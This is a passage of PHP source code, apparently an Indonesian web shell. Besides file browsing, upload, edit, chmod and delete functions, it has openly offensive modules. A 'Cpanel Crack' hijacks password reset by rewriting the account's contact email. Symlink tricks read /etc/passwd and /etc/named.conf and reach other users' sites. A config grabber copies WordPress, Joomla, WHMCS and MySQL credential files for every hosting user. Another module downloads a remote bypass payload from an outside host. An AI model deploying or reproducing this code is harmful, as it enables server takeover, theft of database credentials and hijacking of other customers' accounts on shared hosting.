if (filetype($FilePath) == 'dir') {
$TableFolder .= '<tr>
<td><a href="?p='.BersihkanPath($LinkFile . "/" . $File).'" class="text-decoration-none text-reset"><i class="bi bi-folder"></i> '.$File.'</a></td>
<td>Folder</td>
<td>'.date ("d F Y H:i:s", filemtime($FilePath)).'</td>
<td>'.decoct(fileperms($FilePath) & 0777).'</td>
<td>
<button type="button" class="btn btn-light" data-bs-toggle="modal"
data-bs-target="#Renaming" data-bs-toggle="tooltip" title="Rename" id="RenameButton" data-id="'.$File.'">
<i class="bi bi-pencil-square"></i></button>
<button type="button" class="btn btn-light" data-bs-toggle="modal"
data-bs-target="#ModifyTime" data-bs-toggle="tooltip" title="ModifyTime" id="ModifyTime" data-id="'.$File.'">
<i class="bi bi-clock-fill"></i></button>
<button type="button" class="btn btn-light" data-bs-toggle="modal"
data-bs-target="#Delete" data-bs-toggle="tooltip" title="Delete" id="DeleteButton" data-id="'.$File.'" data-type="Folder">
<i class="bi bi-trash3"></i></button>
</td>
</tr>';
} else {
$TableFile .= '<tr>
<td><i class="bi bi-file-earmark"></i> '.$File.'</td>
<td>'.HitungFileSize(filesize($FilePath)).'</td>
<td>'.date ("d F Y H:i:s", filemtime($FilePath)).'</td>
<td>'.decoct(fileperms($FilePath) & 0777).'</td>
<td>
<button type="button" class="btn btn-light" data-bs-toggle="modal"
data-bs-target="#Renaming" data-bs-toggle="tooltip" title="Rename" id="RenameButton" data-id="'.$File.'">
<i class="bi bi-pencil-square"></i></button>
<button type="button" class="btn btn-light" data-bs-toggle="modal"
data-bs-target="#EditFile" data-bs-toggle="tooltip" title="EditFile" id="EditFileButton" data-id="'.$fedit.'" data-type="Folder">
<i class="bi bi-file-earmark"></i></button>
<button type="button" class="btn btn-light" data-bs-toggle="modal"
data-bs-target="#ModifyTime" data-bs-toggle="tooltip" title="ModifyTime" id="ModifyTime" data-id="'.$File.'">
<i class="bi bi-clock-fill"></i></button>
<button type="button" class="btn btn-light" data-bs-toggle="modal"
data-bs-target="#Chmod" data-bs-toggle="tooltip" title="Chmod" id="ChmodButton" data-id="'.$File.'" data-type="Folder">
<i class="bi bi-person-fill"></i></button>
<a href="?DL='.$File.'" class="text-decoration-none text-reset"><button type="button" class="btn btn-light" data-bs-toggle="tooltip" title="Download">
<i class="bi bi-download"></i></button></a>
<button type="button" class="btn btn-light" data-bs-toggle="modal"
data-bs-target="#Delete" data-bs-toggle="tooltip" title="Delete" id="DeleteButton" data-id="'.$File.'" data-type="File">
<i class="bi bi-trash3"></i></button>
</td>
</tr>';
}
}
}
$IsiTable .= $TableFolder . $TableFile ;
return $IsiTable ;
}
function NgisiBreadCrumb() {
if (isset($_GET["p"])) {
if ($_GET["p"] == "") {
} else {
$array = explode("/", $_GET["p"]);
$parent = null;
$i=0;
$isiBreadCrumb = null;
while($i < (count($array))) {
$parent .= "/" . $array [$i] ;
$parent = BersihkanPath($parent);
$isiBreadCrumb .= '<li class="breadcrumb-item"><a href="?p='.$parent.'" class="text-decoration-none text-reset" >'.$array [$i].'</a></li>' ;
$i += 1 ;
}
return $isiBreadCrumb;
}
}
}
function Pathing () {
$Root = Rootpath();
$PosisiSekarang = getcwd();
$Path = null;
$PosisiSekarang = str_replace("\\","/",$PosisiSekarang);
$ArrayRoot = explode("/",$Root) ;
$ArrayPosisi = explode("/",$PosisiSekarang) ;
$i = count($ArrayPosisi) ;
while ($i > count($ArrayRoot)) {
$Path .= "../";
$i -= 1 ;
}
if (isset($_GET["p"])) {
$Path .= $_GET["p"] ;
}
$Path .= "/";
return $Path ;
}
function DeleteFolder($Path) {
$ListFile = scandir($Path);
foreach ($ListFile as $File) {
$FilePath = $Path . "/". $File;
if($File == "." or $File == "..") {
}else {
if (filetype($FilePath) == 'dir') {
DeleteFolder($FilePath) ;
} else {
unlink($FilePath);
}
}
}
rmdir($Path) ;
}
function DownloadFile () {
if (isset($_GET["DL"])) {
$filename = Pathing() . $_GET["DL"] ;
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header("Cache-Control: no-cache, must-revalidate");
header("Expires: 0");
header('Content-Disposition: attachment; filename="'.basename($filename).'"');
header('Content-Length: ' . filesize($filename));
header('Pragma: public');
}
}
function ButtonAction() {
if(isset($_POST["submit"])) {
$action = $_POST["action"];
if ($action == "Upload File") {
$target_dir = Pathing();
$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);
move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file);
} else if ($action == "New File") {
$NamaFile = $_POST["NamaFile"];
$myfile = fopen(Pathing() . $NamaFile, "w") ;
} else if ($action == "New Folder") {
$NamaFolder = $_POST["NamaFolder"];
mkdir(Pathing() . $NamaFolder);
} else if ($action == "Rename") {
$OldName = $_POST["OldName"];
$NewName = $_POST["NewName"];
rename(Pathing() . $OldName, Pathing() . $NewName) ;
} else if ($action == "Delete") {
$Namaitem = $_POST["NamaItem"];
$Type = $_POST["Type"];
if ($Type == "File") {
unlink(Pathing(). $Namaitem);
} else {
DeleteFolder(Pathing(). $Namaitem);
}
}
}
}
/*
Cpanel Crack
*/
if ($_GET['aksi'] == 'resetpasscp') {
echo '<br/><center><h5 class="text-center"><i class="fa fa-key"></i> Auto Reset Password Cpanel</h5><center>
<form method="POST">
<div class="form-group">
<center><input type="email" name="email" class="form-control" placeholder="Masukan Email..."/></center><br/>
<center><input type="submit" name="submit" class="btn btn-danger btn-block" value="Send"/><center>
</div>
</form>';
if(isset($_POST['submit'])){
$user = get_current_user();
$site = $_SERVER['HTTP_HOST'];
$ips = getenv('REMOTE_ADDR');
$email = $_POST['email'];
$wr = 'email:'.$email;
$f = fopen('/home/'.$user.'/.cpanel/contactinfo', 'w');
fwrite($f, $wr);
fclose($f);
$f = fopen('/home/'.$user.'/.contactinfo', 'w');
fwrite($f, $wr);
fclose($f);
$parm = $site.':2082/resetpass?start=1';
echo '<br/>Url: '.$parm.'';
echo '<br/>Username: '.$user.'';
echo '<br/>Success Reset To: '.$email.'<br/><br/>';
}
exit;
}
/*
Adminer
*/
if($_GET['aksi'] == 'adminer') {
$full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $path);
function adminer($url, $isi) {
$fp = fopen($isi, "w");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FILE, $fp);
return curl_exec($ch);
curl_close($ch);
fclose($fp);
ob_flush();
flush();
}
if(file_exists('adminer.php')) {
echo "<center><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center><br/>";
} else {
if(adminer("https://www.adminer.org/static/download/4.8.1/adminer-4.8.1.php","adminer.php")) {
echo "<center><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center><br/>";
} else {
echo "<center><font color=red>gagal buat file adminer</font></center><br/>";
}
}
exit;
}
/*
Symlink
*/
if($_GET['aksi'] == 'symlink') {
if(!is_file('named.txt')){
$d00m = @file("/etc/named.conf");
}else{
$d00m = @file("named.txt");
}
if(!$d00m) {
die ("[ <a href='?dir=$path&aksi=symread'>Bypass Read</a> ] [ <a href='?dir=$path&aksi=sym_404'>Symlink 404</a> ] [ <a href='?dir=$path&aksi=sym_bypas'>Symlink Bypass</a> ]<br/><font color='red'>Error tidak dapat membaca /etc/named.conf</font><br/><br/>");
}
else{
echo "[ <a href='?dir=$path&aksi=symread'>Bypass Read</a> ] [ <a href='?dir=$path&aksi=sym_404'>Symlink 404</a> ] [ <a href='?dir=$path&aksi=sym_bypas'>Symlink Bypass</a> ]<div class='tmp'>
<table align='center' width='100%'>
<thead class='bg-info'>
<th>Domains</th>
<th>Users</th>
<th>symlink </th>
</thead>";
foreach($d00m as $dom){
if(eregi("zone",$dom)){
preg_match_all('#zone "(.*)"#', $dom, $domsws);
flush();
if(strlen(trim($domsws[1][0])) > 2){
$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
flush();
$site = $user['name'] ;
@symlink("/","sym/root");
$site = $domsws[1][0];
$ir = 'ir';
$il = 'il';
if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) ) {
$site = ".$domsws[1][0].";
}
echo "
<tr>
<td>
<a target='_blank' href=http://www.".$domsws[1][0]."/>".$site." </a>
</td>
<td>
".$user['name']."
</td>
<td>
<a href='sym/root/home/".$user['name']."/public_html' target='_blank'>Symlink</a>
</td>
</tr>";
flush();
flush();
}
}
}
echo "</table>
</div><br/>";
}
exit;
}
if($_GET['aksi'] == 'symread') {
echo "read /etc/named.conf";
echo "<form method='post' action='?dir=$dir&aksi=symread&save=1'>
<textarea class='form-control' rows='8' name='file'>";
flush();
flush();
$file = '/etc/named.conf';
$r3ad = @fopen($file, 'r');
if ($r3ad){
$content = @fread($r3ad, @filesize($file));
echo "".htmlentities($content)."";
}else if (!$r3ad) {
$r3ad = @show_source($file) ;
}else if (!$r3ad) {
$r3ad = @highlight_file($file);
}else if (!$r3ad) {
$sm = @symlink($file,'sym.txt');
if ($sm){
$r3ad = @fopen('sym/sym.txt', 'r');
$content = @fread($r3ad, @filesize($file));
echo "".htmlentities($content)."";
}
}
echo "</textarea><br/><input type='submit' class='btn btn-danger form-control' value='Save'/> </form>";
if(isset($_GET['save'])){
$cont = stripcslashes($_POST['file']);
$f = fopen('named.txt','w');
$w = fwrite($f,$cont);
if($w){
echo '<br/>save has been successfully';
}
fclose($f);
}
exit;
}
if ($_GET['aksi'] == 'sym_404'){
echo '<h2>Symlink 404</h2>
<form method="post">
File Target: <input type="text" class="form-control" name="dir" value="/home/user/public_html/wp-config.php"><br>
Save As: <input type="text" class="form-control" name="isi" placeholder="[Ex] file.txt"/><br/>
<input type="submit" class="btn btn-danger btn-block" value="Execute" name="execute"/>
</form>';
if($_POST['execute']){
rmdir("gds_sym404");
mkdir("gds_sym404", 0777);
$dir = $_POST['dir'];
$isi = $_POST['isi'];
system("ln -s ".$dir."gds_sym404/".$isi);
symlink($dir,"gds_sym404/".$isi);
$inija = fopen("gds_sym404/.htaccess", "w");
fwrite($inija,"ReadmeName ".$isi."\nOptions Indexes FollowSymLinks\nDirectoryIndex ids.html\nAddType text/plain .php\nAddHandler text/plain .php\nSatisfy Any");
echo'<a href="/gds_sym404/" target="_blank"> >>Sukses<< </a>';
}
exit;
}
if ($_GET['aksi'] == 'sym_bypas'){
if(isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0){
$cont = stripcslashes($_POST['file']);
if(!file_exists('passwd.txt')){
$f = @fopen('passwd.txt','w');
$w = @fwrite($f,$cont);
fclose($f);
}
if($w or @filesize('passwd.txt') > 0){
echo "<div class='tmp mb-4'>
<table width='100%'>
<thead class='bg-info text-center'>
<th>Users</th>
<th>symlink</th>
<th>FTP</th>
</thead>";
flush();
$fil3 = file('passwd.txt');
foreach ($fil3 as $f){
$u=explode(':', $f);
$user = $u['0'];
echo "<tr class='text-dark'>
<td class='text-left pl-1'>$user</td>
<td>
<a href='sym/root/home/$user/public_html' target='_blank'>Symlink </a>
</td>
<td>
<a href='$pageFTP/sym/root/home/$user/public_html' target='_blank'>FTP</a>
</td>
</tr>";
flush();
flush();
}
die ("</tr></table></div>");
}
}
echo "read /etc/passwd";
echo "<br/><form method='post' action='?dir=$dir&aksi=sym_bypas&save=1'>
<textarea class='form-control' rows='8' name='file'>";
flush();
$file = '/etc/passwd';
$r3ad = @fopen($file, 'r');
if ($r3ad){
$content = @fread($r3ad, @filesize($file));
echo "".htmlentities($content)."";
}elseif(!$r3ad) {
$r3ad = @show_source($file) ;
}elseif(!$r3ad) {
$r3ad = @highlight_file($file);
}elseif(!$r3ad) {
for($uid=0;$uid<1000;$uid++){
$ara = posix_getpwuid($uid);
if (!empty($ara)) {
while (list ($key, $val) = each($ara)){
print "$val:";
}
print "\n";
}
}
}
flush();
echo "</textarea><br/>
<input type='submit' class='btn btn-danger btn-block' value='Symlink'/><br/>
</form>";
flush();
exit;
}
if($_GET['aksi'] == 'symread') {
echo "read /etc/named.conf";
echo "<form method='post' action='?dir=$dir&aksi=symread&save=1'>
<textarea class='form-control' rows='8' name='file'>";
flush();
flush();
$file = '/etc/named.conf';
$r3ad = @fopen($file, 'r');
if ($r3ad){
$content = @fread($r3ad, @filesize($file));
echo "".htmlentities($content)."";
}else if (!$r3ad) {
$r3ad = @show_source($file) ;
}else if (!$r3ad) {
$r3ad = @highlight_file($file);
}else if (!$r3ad) {
$sm = @symlink($file,'sym.txt');
if ($sm){
$r3ad = @fopen('sym/sym.txt', 'r');
$content = @fread($r3ad, @filesize($file));
echo "".htmlentities($content)."";
}
}
echo "</textarea><br/><input type='submit' class='btn btn-danger form-control' value='Save'/> </form>";
if(isset($_GET['save'])){
$cont = stripcslashes($_POST['file']);
$f = fopen('named.txt','w');
$w = fwrite($f,$cont);
if($w){
echo '<br/>save has been successfully';
}
fclose($f);
}
exit;
}
if ($_GET['aksi'] == 'bypascf') {
echo '<form method="POST"><br>
<div class="form-group input-group">
<select class="form-control" name="idsPilih">
<option>Pilih Metode</option>
<option>ftp</option>
<option>direct-conntect</option>
<option>Webmail</option>
<option>Cpanel</option>
</select>
</div>
<div class="form-group input-group">
<input class="form-control" type="text" name="target" placeholder="Masukan Url">
<input class="btn btn-danger form-control" type="submit" value="Bypass">
</div><br>
</form>';
$target = $_POST['target'];
# Bypass From FTP
if($_POST['idsPilih'] == "ftp") {
$ftp = gethostbyname("ftp."."$target");
echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct
ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$ftp</font></p>";
}
# Bypass From Direct-Connect
if($_POST['idsPilih'] == "direct-conntect") {
$direct = gethostbyname("direct-connect."."$target");
echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct
ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$direct</font></p>";
}
# Bypass From Webmail
if($_POST['idsPilih'] == "webmail") {
$web = gethostbyname("webmail."."$target");
echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct
ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$web</font></p>";
}
# Bypass From Cpanel
if($_POST['idsPilih'] == "cpanel") {
$cpanel = gethostbyname("cpanel."."$target");
echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct
ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$cpanel</font></p>";
}
exit;
}
/*
bypass403
*/
if($_GET['aksi'] == 'bypass403') {
$full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $path);
function bypass403($url, $isi) {
$fp = fopen($isi, "w");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FILE, $fp);
return curl_exec($ch);
curl_close($ch);
fclose($fp);
ob_flush();
flush();
}
if(file_exists('bypass403.php')) {
echo "<center><a href='$full/bypass403.php' target='_blank'>-> bypass403 <-</a></font></center><br/>";
} else {
if(bypass403("https://shell.prinsh.com/Nathan/bypass403.txt","bypass.php")) {
echo "<center><a href='$full/bypass403.php' target='_blank'>-> bypass403 <-</a></font></center><br/>";
} else {
echo "<center><font color=red>gagal buat bypass403</font></center><br/>";
}
}
exit;
}
/*
Config
*/
if($_GET['aksi'] == 'config') {
$etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
$con = mkdir("gds_config", 0777);
$isi_htc = "Options all\nRequire None\nSatisfy Any";
$htc = fopen("gds_config/.htaccess","w");
fwrite($htc, $isi_htc);
while($passwd = fgets($etc)) {
if($passwd == "" || !$etc) {
echo "<font color=red>Can't read /etc/passwd</font>";
} else {
preg_match_all('/(.*?):x:/', $passwd, $user_config);
foreach($user_config[1] as $user_con) {
$user_config_dir = "/home/$user_con/public_html/";
if(is_readable($user_config_dir)) {
$grab_config =
[
"/home/$user_con/.my.cnf" => "cpanel",
"/home/$user_con/public_html/config/koneksi.php" => "Lokomedia",
"/home/$user_con/public_html/forum/config.php" => "phpBB",
"/home/$user_con/public_html/sites/default/settings.php" => "Drupal",
"/home/$user_con/public_html/config/settings.inc.php" => "PrestaShop",
"/home/$user_con/public_html/app/etc/local.xml" => "Magento",
"/home/$user_con/public_html/admin/config.php" => "OpenCart",
"/home/$user_con/public_html/application/config/database.php" => "Ellislab",
"/home/$user_con/public_html/vb/includes/config.php" => "Vbulletin",
"/home/$user_con/public_html/includes/config.php" => "Vbulletin",
"/home/$user_con/public_html/forum/includes/config.php" => "Vbulletin",
"/home/$user_con/public_html/forums/includes/config.php" => "Vbulletin",
"/home/$user_con/public_html/cc/includes/config.php" => "Vbulletin",
"/home/$user_con/public_html/inc/config.php" => "MyBB",
"/home/$user_con/public_html/includes/configure.php" => "OsCommerce",
"/home/$user_con/public_html/shop/includes/configure.php" => "OsCommerce",
"/home/$user_con/public_html/os/includes/configure.php" => "OsCommerce",
"/home/$user_con/public_html/oscom/includes/configure.php" => "OsCommerce",
"/home/$user_con/public_html/products/includes/configure.php" => "OsCommerce",
"/home/$user_con/public_html/cart/includes/configure.php" => "OsCommerce",
"/home/$user_con/public_html/inc/conf_global.php" => "IPB",
"/home/$user_con/public_html/wp-config.php" => "Wordpress",
"/home/$user_con/public_html/wp/test/wp-config.php" => "Wordpress",
"/home/$user_con/public_html/blog/wp-config.php" => "Wordpress",
"/home/$user_con/public_html/beta/wp-config.php" => "Wordpress",
"/home/$user_con/public_html/portal/wp-config.php" => "Wordpress",
"/home/$user_con/public_html/site/wp-config.php" => "Wordpress",
"/home/$user_con/public_html/wp/wp-config.php" => "Wordpress",
"/home/$user_con/public_html/WP/wp-config.php" => "Wordpress",
"/home/$user_con/public_html/news/wp-config.php" => "Wordpress",
"/home/$user_con/public_html/wordpress/wp-config.php" => "Wordpress",
"/home/$user_con/public_html/test/wp-config.php" => "Wordpress",
"/home/$user_con/public_html/demo/wp-config.php" => "Wordpress",
"/home/$user_con/public_html/home/wp-config.php" => "Wordpress",
"/home/$user_con/public_html/v1/wp-config.php" => "Wordpress",
"/home/$user_con/public_html/v2/wp-config.php" => "Wordpress",
"/home/$user_con/public_html/press/wp-config.php" => "Wordpress",
"/home/$user_con/public_html/new/wp-config.php" => "Wordpress",
"/home/$user_con/public_html/blogs/wp-config.php" => "Wordpress",
"/home/$user_con/public_html/configuration.php" => "Joomla",
"/home/$user_con/public_html/blog/configuration.php" => "Joomla",
"/home/$user_con/public_html/submitticket.php" => "^WHMCS",
"/home/$user_con/public_html/cms/configuration.php" => "Joomla",
"/home/$user_con/public_html/beta/configuration.php" => "Joomla",
"/home/$user_con/public_html/portal/configuration.php" => "Joomla",
"/home/$user_con/public_html/site/configuration.php" => "Joomla",
"/home/$user_con/public_html/main/configuration.php" => "Joomla",
"/home/$user_con/public_html/home/configuration.php" => "Joomla",
"/home/$user_con/public_html/demo/configuration.php" => "Joomla",
"/home/$user_con/public_html/test/configuration.php" => "Joomla",
"/home/$user_con/public_html/v1/configuration.php" => "Joomla",
"/home/$user_con/public_html/v2/configuration.php" => "Joomla",
"/home/$user_con/public_html/joomla/configuration.php" => "Joomla",
"/home/$user_con/public_html/new/configuration.php" => "Joomla",
"/home/$user_con/public_html/WHMCS/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/whmcs1/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Whmcs/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/whmcs/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/whmcs/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/WHMC/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Whmc/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/whmc/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/WHM/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Whm/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/whm/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/HOST/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Host/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/host/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/SUPPORTES/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Supportes/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/supportes/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/domains/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/domain/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Hosting/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/HOSTING/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/hosting/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/CART/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Cart/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/cart/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/ORDER/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Order/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/order/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/CLIENT/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Client/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/client/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/CLIENTAREA/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Clientarea/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/clientarea/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/SUPPORT/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Support/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/support/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/BILLING/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Billing/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/billing/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/BUY/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Buy/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/buy/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/MANAGE/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Manage/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/manage/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/CLIENTSUPPORT/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/ClientSupport/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Clientsupport/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/clientsupport/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/CHECKOUT/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Checkout/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/checkout/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/BILLINGS/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Billings/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/billings/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/BASKET/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Basket/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/basket/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/SECURE/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Secure/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/secure/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/SALES/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Sales/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/sales/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/BILL/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Bill/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/bill/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/PURCHASE/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Purchase/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/purchase/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/ACCOUNT/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Account/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/account/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/USER/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/User/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/user/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/CLIENTS/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Clients/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/clients/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/BILLINGS/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Billings/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/billings/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/MY/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/My/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/my/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/secure/whm/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/secure/whmcs/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/panel/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/clientes/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/cliente/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/support/order/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/bb-config.php" => "BoxBilling",
"/home/$user_con/public_html/boxbilling/bb-config.php" => "BoxBilling",
"/home/$user_con/public_html/box/bb-config.php" => "BoxBilling",
"/home/$user_con/public_html/host/bb-config.php" => "BoxBilling",
"/home/$user_con/public_html/Host/bb-config.php" => "BoxBilling",
"/home/$user_con/public_html/supportes/bb-config.php" => "BoxBilling",
"/home/$user_con/public_html/support/bb-config.php" => "BoxBilling",
"/home/$user_con/public_html/hosting/bb-config.php" => "BoxBilling",
"/home/$user_con/public_html/cart/bb-config.php" => "BoxBilling",
"/home/$user_con/public_html/order/bb-config.php" => "BoxBilling",
"/home/$user_con/public_html/client/bb-config.php" => "BoxBilling",
"/home/$user_con/public_html/clients/bb-config.php" => "BoxBilling",
"/home/$user_con/public_html/cliente/bb-config.php" => "BoxBilling",
"/home/$user_con/public_html/clientes/bb-config.php" => "BoxBilling",
"/home/$user_con/public_html/billing/bb-config.php" => "BoxBilling",
"/home/$user_con/public_html/billings/bb-config.php" => "BoxBilling",
"/home/$user_con/public_html/my/bb-config.php" => "BoxBilling",
"/home/$user_con/public_html/secure/bb-config.php" => "BoxBilling",
"/home/$user_con/public_html/support/order/bb-config.php" => "BoxBilling",
"/home/$user_con/public_html/includes/dist-configure.php" => "Zencart",
"/home/$user_con/public_html/zencart/includes/dist-configure.php" => "Zencart",
"/home/$user_con/public_html/products/includes/dist-configure.php" => "Zencart",
"/home/$user_con/public_html/cart/includes/dist-configure.php" => "Zencart",
"/home/$user_con/public_html/shop/includes/dist-configure.php" => "Zencart",
"/home/$user_con/public_html/includes/iso4217.php" => "Hostbills",
"/home/$user_con/public_html/hostbills/includes/iso4217.php" => "Hostbills",
"/home/$user_con/public_html/host/includes/iso4217.php" => "Hostbills",
"/home/$user_con/public_html/Host/includes/iso4217.php" => "Hostbills",
"/home/$user_con/public_html/supportes/includes/iso4217.php" => "Hostbills",
"/home/$user_con/public_html/support/includes/iso4217.php" => "Hostbills",
"/home/$user_con/public_html/hosting/includes/iso4217.php" => "Hostbills",
"/home/$user_con/public_html/cart/includes/iso4217.php" => "Hostbills",
"/home/$user_con/public_html/order/includes/iso4217.php" => "Hostbills",
"/home/$user_con/public_html/client/includes/iso4217.php" => "Hostbills",
"/home/$user_con/public_html/clients/includes/iso4217.php" => "Hostbills",
"/home/$user_con/public_html/cliente/includes/iso4217.php" => "Hostbills",
"/home/$user_con/public_html/clientes/includes/iso4217.php" => "Hostbills",
"/home/$user_con/public_html/billing/includes/iso4217.php" => "Hostbills",
"/home/$user_con/public_html/billings/includes/iso4217.php" => "Hostbills",
"/home/$user_con/public_html/my/includes/iso4217.php" => "Hostbills",
"/home/$user_con/public_html/secure/includes/iso4217.php" => "Hostbills",
"/home/$user_con/public_html/support/order/includes/iso4217.php" => "Hostbills"
];
foreach($grab_config as $config => $nama_config) {
$ambil_config = file_get_contents($config);
if($ambil_config == '') {
} else {
$file_config = fopen("gds_config/$user_con-$nama_config.txt","w");
fputs($file_config,$ambil_config);
}
}
}
}
}
}
echo "<center><a href='?dir=$path/gds_config'><font color=lime>Done</font></a></center>";
exit;
}
?>
<?php
error_reporting(0);
